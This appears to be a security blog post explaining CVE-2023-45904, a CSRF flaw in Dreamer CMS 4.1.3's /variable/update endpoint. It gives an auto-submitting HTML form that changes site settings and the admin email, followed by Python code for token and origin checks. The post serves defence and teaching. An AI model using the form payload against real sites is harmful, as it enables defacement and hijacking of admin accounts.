Dreamer CMS is a popular, open-source Content Management System used to build websites. Security researchers have discovered multiple vulnerabilities in this platform, and one worth knowing about is CVE-2023-45904, a Cross-Site Request Forgery (CSRF) vulnerability affecting Dreamer CMS version 4.1.3. If you use Dreamer CMS or are just interested in web security, this post will explain what’s going on, what could happen, and how to defend yourself.

- Vulnerability Type: Cross-Site Request Forgery (CSRF)
- Affected Component: /variable/update endpoint
- Version Affected: Dreamer CMS v4.1.3

With this CSRF flaw, an attacker could trick an authenticated admin into executing unwanted actions, like changing website settings, without their knowledge.

Original Reference

- NVD Entry: CVE-2023-45904
- Exploit Database: 52432

What is CSRF and How Does It Work?

CSRF is an attack that tricks a logged-in user into submitting a web request they didn’t intend. If a user is logged into Dreamer CMS as an admin and visits a malicious page in another tab, that page could send requests on their behalf, without their permission.

Most modern applications prevent this with CSRF tokens, but Dreamer CMS v4.1.3 is missing those protections on /variable/update.

1. Admin logs in to Dreamer CMS and leaves the session active.
2. Attacker tricks admin into visiting a webpage containing malicious code (could be a clever link or image).
3. The malicious code sends a specially crafted request to /variable/update.
4. The server receives the request (coming from the admin’s browser) and performs the action as if it were the admin.

Exploit Example

Say the CMS website is hosted at http://victim.com/admin. An attacker wants to change a website setting to something malicious. They could set up a webpage with this HTML:

```html
<html>
  <body>
    <form action="http://victim.com/admin/variable/update" method="POST" id="csrfForm">
      <input type="hidden" name="site_title" value="HACKED by Attacker">
      <input type="hidden" name="admin_email" value="evil@attacker.com">
    </form>
    <script>
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>
```

How it works

- Any admin who’s _still logged in_ and visits the attacker’s web page will automatically submit this form.

How to Defend Yourself

1. Check for CSRF Tokens: Only allow variable updates with a valid anti-CSRF token.
2. Restrict Origin & Referrer: Server-side checks to ensure requests only come from trusted sources.
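The two defenses above, combined into one server-side gate as an added example (this is illustrative code written for this post, not Dreamer CMS’s own code): a synchronizer token bound to the admin session plus an Origin/Referer check, applied to POSTs on the /admin/variable/update path. The trusted origin, the `_csrf` form field name and the protected path are assumptions taken from the example host used on this page.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Assumed values based on the page's example host; adjust for a real deployment.
TRUSTED_ORIGIN = "http://victim.com"
PROTECTED_PATHS = {"/admin/variable/update"}


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Synchronizer-token pattern: mint one unguessable token per admin session,
    keep it server-side, and embed it as a hidden `_csrf` field in every form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _source_origin(headers: Dict[str, str]) -> Optional[str]:
    """Derive the browser-reported source origin: Origin first, Referer as fallback."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def is_allowed(method: str, path: str, headers: Dict[str, str],
               form: Dict[str, str], session: Dict[str, str]) -> Tuple[bool, str]:
    """Gate for state-changing requests. Returns (allowed, reason)."""
    if method.upper() != "POST" or path not in PROTECTED_PATHS:
        return True, "not a protected state-changing request"
    # Check 1: the request must carry the token tied to this admin's session.
    # A cross-site page cannot read the token, so a forged form cannot supply it.
    expected = session.get("csrf_token")
    supplied = form.get("_csrf", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid anti-CSRF token"
    # Check 2: the source origin must be the CMS itself; browsers always attach
    # Origin to cross-site POSTs, so an auto-submitted attacker form is exposed here.
    source = _source_origin(headers)
    if source is None:
        return False, "no Origin or Referer header on a state-changing request"
    if source != TRUSTED_ORIGIN:
        return False, f"cross-origin request from {source}"
    return True, "ok"
```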

Conclusion

CVE-2023-45904 is a serious security bug in Dreamer CMS 4.1.3. An attacker can trick admins into changing crucial website settings simply by making them visit a malicious web page. The fix is to update your CMS and make sure anti-CSRF measures are in place. If you’re running Dreamer CMS, check your version and patch up as soon as possible. Stay safe!

Further Reading

- OWASP: Cross-Site Request Forgery (CSRF)
- NVD CVE-2023-45904
- Exploit Database Entry

Have more questions? Drop a comment or share your experience. Stay patched!

Timeline

Published on: 10/17/2023 14:15:10 UTC
Last modified on: 10/18/2023 17:55:56 UTC